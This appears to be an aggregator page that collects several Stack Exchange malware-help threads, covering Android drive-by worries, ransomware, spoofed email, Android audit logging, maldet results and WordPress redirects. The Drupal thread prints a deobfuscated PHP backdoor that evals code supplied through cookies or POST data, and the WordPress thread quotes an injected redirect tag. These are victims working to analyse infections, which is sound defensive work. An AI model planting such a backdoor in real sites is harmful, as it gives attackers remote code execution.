Worried about possible malware – Android Enthusiasts Stack Exchange

I’m hoping someone can help me here. Yesterday I was doing some research for an essay when I clicked a website (very dumb of me, who never clicks suspicious websites or links) that redirected me. I immediately backed off, the page didn’t load. If anything I spent about a second there. Being the paranoid person I am, I have malware bytes installed, scanned, clear. Avast, clear. Sophos warned me about a PUA, which was a .com.google.chrome(some letters) file. Immediately deleted it, but then again Sophos also warned me about another app being a PUA, when it’s in fact, safe.

I cleared the google chrome cache. I’d like to note that I DID NOT download anything, I didn’t click any links, I didn’t click anything but the back button, I didn’t give any permissions. I’m on android 10, Xiaomi redmi note 7 (encrypted), and updated to miui12 last night. My phone isn’t acting odd or anything.

I’m just extremely worried about being infected. I checked that website on hybrid analysis which came back as malicious (attack method as hooking), virus total said the same, but google safe browsing didn’t detect anything, this site was detected as malicious on 2-3 checkers. I was on google chrome at the time.
Should I be concerned?

I don’t do banking on my phone as I have a separate apple device for that.

Is there anything else I can do, for peace of mind? Thanks in advance.

drupal – How does this php malware code work?

I am trying to figure out what a php malware attack is doing.
It looks like the code got injected into php files throughout the application.
There are multiple files with weird names created.
All index.php files have a .ico file @include with more malicious code.
Here’s a piece of code I’ve unscrambled so far in one of the files:

// file: 69a37i3n.php
// only cookie I have seen: _ga=GA1.2.1548240392.1610697094
foreach (array_merge($_COOKIE, $_POST) as $pqvsj => $fvrzeet) {
    function spqrmii($pqvsj, $xleag) {
        return substr(str_repeat($pqvsj . "98211dea-faaf-4f62-9b4b-5d1bdab21324", ($xleag / strlen($pqvsj)) + 1), 0, $xleag);
    }
    function xafxt($hmlbuxx) {
        return @pack("H*", $hmlbuxx);
    }
    function gzphbr($hmlbuxx) {
        $zomcez = count($hmlbuxx) % 3;
        if (!$zomcez) {
            eval($hmlbuxx(1)($hmlbuxx(2)));
            exit();
        }
    }
    $fvrzeet = xafxt($fvrzeet);
    gzphbr(explode("#", $fvrzeet ^ spqrmii($pqvsj, strlen($fvrzeet))));
}

Looks like the cookie contains some hex string evaluated as a code throughout the site.
“98211dea-faaf-4f62-9b4b-5d1bdab21324” varies between different injected php files.
At some point, I’ll need to figure out how this got injected via Drupal 7,php 5, or some 3rd party libs.

Thank you for your help!

malware – How to remove IGAL ransomware

You don’t remove ransomware, because when you know a ransomware is on your system, it’s already too late. You either have good backups in place, or you keep from getting infected. What you can do is to recover from the damage.

If you can recover the files without paying, it depends on how the ransomware was built. Earlier versions had issues with the crypto setup and sometimes you could recover the files without paying, but those cases are getting rarer every day.

You can wait to see if someone breaks its encryption, or pay for the key. There’s no other way.

malware – How to determine if a PC is safe after receiving a suspicious email message

I was checking my gmail account spam folder and I noticed an email sent by a known sender.

I thought it was flagged as spam by mistake so I opened it. Then I realized the content is the same as another email I sent the same person about a month ago. Even the subject is the same.

The sender’s name is correct, but I checked the headers and the actual address is not the sender’s. I checked it on various blacklist search engines but apparently it came clean, WHOIS has redacted data for privacy reasons but it seems to be just a case of spoofing.

The message also has an encrypted .zip file attached that was not present in the original mail. In the message there’s a password to open the .zip file but there’s no way I’m going to open the thing on my PC.

The mail content is pretty spooky, though. I mean, it’s an email I sent and supposedly only the receiver and me knew about it. I want to make sure there’s nothing wrong with my account/devices. I’m wondering if the mail was “stolen” through malware on one of my devices, or on the other person’s. We both used gmail accounts.

I safely store my passwords using an appropriate encryption software (KeePass) and have 2FA enabled, I’m pretty cautious when browsing and checking my mail (stuff like checking link urls before opening them). The other person, on the other hand, stores his passwords on a plain text file (I literally saw him open it), so I suppose his security could be pretty lacking.

What should I do in this situation? How could I inspect the content of the .zip file without exposing my machine and/or my personal data? I was thinking of installing some linux distro on a virtual machine to check it out. Should I download the file on my PC and transfer it on the machine? Or should I open gmail from inside the machine itself and download the attachment? I’m worrying that the former method could expose my PC, while the latter could allow the collection of personal data.

malware – How to identify the app/process which re-mounts partitions R/W, creates files and changes file permissions?

Note: Following solution requires a rooted device. Kernel must be built with AUDIT_WATCH, preferably AUDIT_TREE.

The only good thing Google did was to choose the flexible and configurable Linux kernel for Android, not going for something like a crippled kernel and trying to handle everything from userspace, including running a Linux kernel (1).

Linux kernel’s Audit System makes it possible to log any system calls or filesystem changes made by a process. In our case we need to identify the process(es) which are writing to /sdcard or /system and making syscalls mount and chmod.

Linux distributions have a service auditd which communicates with kernel to get information about security-related events. On Android we have already logd, not as configurable as auditd but enough for basic monitoring. logd mainly covers the functionality of its desktop counterpart syslogd, but also includes klogd and partially auditd to get logs from SELinux subsystem of kernel.

We can add a few more rules using auditctl to also report events we are interested in. You can use auditctl from a minimal Linux environment on your Android device, or compile the binary from source code (should be built with –with-arm / –with-aarch64 whatever your devices’ architecture is), or get one pre-compiled here.

Now create rules files in /etc or wherever you want to:

# /etc/audit-start.rules

# enable auditing, won't work in PID namespace
# won't work if permanently disabled with kernel parameter "audit=0"
-e 1

# delete previous rules (though there are none on Android)
-D

# increase the buffers to avoid failure
# no. of event to be queued, waiting for logd to read them
-b 10000

# disable rate limit (msgs/sec) to avoid failure
-r 0

# this determines how long to wait in burst of events
--backlog_wait_time 0

# set failure mode to dmesg
-f 1

# define filesystem rules, whatever file/directory you want to watch
-w /system -p wa -k FILESYSTEM_AUDIT

# define syscall rules, see all syscalls with 'ausyscall --dump' or
# here: github.com/linux-audit/audit-userspace/blob/master/lib/aarch64_table.h
-a always,exit -S fchmod -S fchmodat -k CHMOD_AUDIT
-a always,exit -S mount -k MOUNT_AUDIT
# /etc/audit-stop.rules

# clear on exit, restore Android default values
-e 0
-D
-b 64
-r 5
--backlog_wait_time 18000

Apply rules:

~# auditctl -R /etc/audit-start.rules

Now make changes; mount /system R/W, write/delete something there and change file permissions.

Depending on logd configuration, you can get audit log in one or more of different logs (2) including events buffer (3) of logcat and main buffer (4):

~# logcat -d -b events,main | grep _AUDIT

Or in kernel’s printk buffer (5) and logact‘s kernel buffer (6):

~# dmesg | grep _AUDIT
~# logcat -d -b kernel | grep _AUDIT
audit(0.0:16122): arch=c00000b7 syscall=40 success=yes exit=0 a0=7fcec5db38 a1=7fcec5db3f a2=0 a3=8021 items=1 ppid=761 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="busybox" exe="/data/data/com.mixplorer/files/busybox/busybox" subj=u:r:magisk:s0 key="MOUNT_AUDIT"
audit(0.0:16126): arch=c00000b7 syscall=53 success=yes exit=0 a0=ffffff9c a1=7b839180c0 a2=81a4 a3=0 items=1 ppid=11687 auid=4294967295 uid=10135 gid=10135 euid=10135 suid=10135 fsuid=10135 egid=10135 sgid=10135 fsgid=10135 tty=(none) ses=4294967295 comm="Thread-7" exe="/system/bin/app_process64" subj=u:r:untrusted_app:s0:c135,c256,c512,c768 key="CHMOD_AUDIT"
audit(0.0:16141): arch=c00000b7 syscall=35 success=yes exit=0 a0=ffffff9c a1=7bc22a3c40 a2=0 a3=7bdfbd3098 items=2 ppid=11687 auid=4294967295 uid=10135 gid=10135 euid=10135 suid=10135 fsuid=10135 egid=10135 sgid=10135 fsgid=10135 tty=(none) ses=4294967295 comm="pool-2-thread-1" exe="/system/bin/app_process64" subj=u:r:untrusted_app:s0:c135,c256,c512,c768 key="FILESYSTEM_AUDIT"

First line shows that some process running as root with Magisk’s SELinux context has made syscall 40 (mount) and the command shows it’s MiXplorer app (just as example, I did that myself).
Second line indicates that the app running with UID 10135 has chmoded something.
Third line shows the same app (by making syscall 35) deleted something in /system partition.

This is a simple use case. More recursive rules can be defined to deal with complex situations, interpreting other fields of log as well, as explained here.

To clear rules:

~# auditctl -R /etc/audit-stop.rules

NOTE:

  • For simple cases where the objective is just to get notified of some filesystem changes (and not to trace the originator), inotify API can be used instead as explained in this answer.
  • In order to mark all the processes that run before the audit starts auditable by kernel, pass audit=1 boot parameter to kernel, either by editing cmdline in boot.img or use fastboot -c option.
  • To save audit log to a file, run logcat in background:

    logcat -s auditd -b events -f /data/media/0/auditd.log &
    

malware – How I can read and handle MS Office documents, such as doc/ppt files, securely?

I’ve heard of too many horror stories of people opening a seemingly innocent docx or pptx file that they’ve got from a business partner, only to find out that it had embedded malware inside. What should a security conscious person do if they receive a doc or a ppt file that they wish to see the contents of, but cannot guarantee the reliability of its source? Is there any recommended practice to handle this, besides ‘don’t do it’?

malware – Cannot interpret maldet results

after executing sudo maldet -a /

LMD provides the following report:

HOST:      foo.bar.baz
SCAN ID:   210117-2223.1145531
STARTED:   Jan 17 2021 22:23:26 +0000
COMPLETED: Jan 18 2021 22:01:12 +0000
ELAPSED:   85066s [find: 42s]

PATH:          /
TOTAL FILES:   579780
TOTAL HITS:    2
TOTAL CLEANED: 0

WARNING: Automatic quarantine is currently disabled, detected threats are still accessible to users!
To enable, set quarantine_hits=1 and/or to quarantine hits from this scan run:
/usr/local/sbin/maldet -q 210117-2223.1145531

FILE HIT LIST:
{HEX}php.cmdshell.antichat.201 : /home/foo/maldetect-1.6.4/files/sigs/rfxn.yara
{HEX}php.gzbase64.inject.452 : /home/foo/maldetect-1.6.4/files/clean/gzbase64.inject.unclassed
===============================================
Linux Malware Detect v1.6.4 < proj@rfxn.com >

I struggle to interpret the results of the two hits. Is it in the home directory and what does HEX mean?

Can’t find cause of malware in WordPress site – adding html files with redirects

I’m helping a non-profit and they have had malware on their WordPress site. I installed Sucuri and it quickly finds some strangely named HTML files in the base directory. I removed those files. Because of the malware found, the non-profit was blacklisted on 3 different spam sites (mxlookup search). I had updated all of their plugins, WordPress software, themes. I had removed unused themes and removed other users. They finally got off of the blacklists, but then today Sucuri found another malware file.

The file is always in the base wordpress directory and named with random characters (e.g., QPez2ejsEdss.html) and the contents is this:

<meta http-equiv="refresh" content="0;http://SOME_STRANGE_WEBSITE/">

Where SOME_STRANGE_WEBSITE is clearly a bad website.

What tools can I use to find the dropper of the malware?

antimalware – How to check for malware before downloading a torrent file?

I wanted to know if there is a way to check if a torrent file has malware or not, before actually downloading it via uTorrent f.e.

I only know VirusTotal site. Is this one reliable? Because each time I past a link in it, it says that the link/file is safe. So I don’t know if every single link/file I paste on virustotal is clear and safe or just the web doesn’t detect malware well.

Best option for me would be to have a way to check it on the web without downloading 3rd party apps.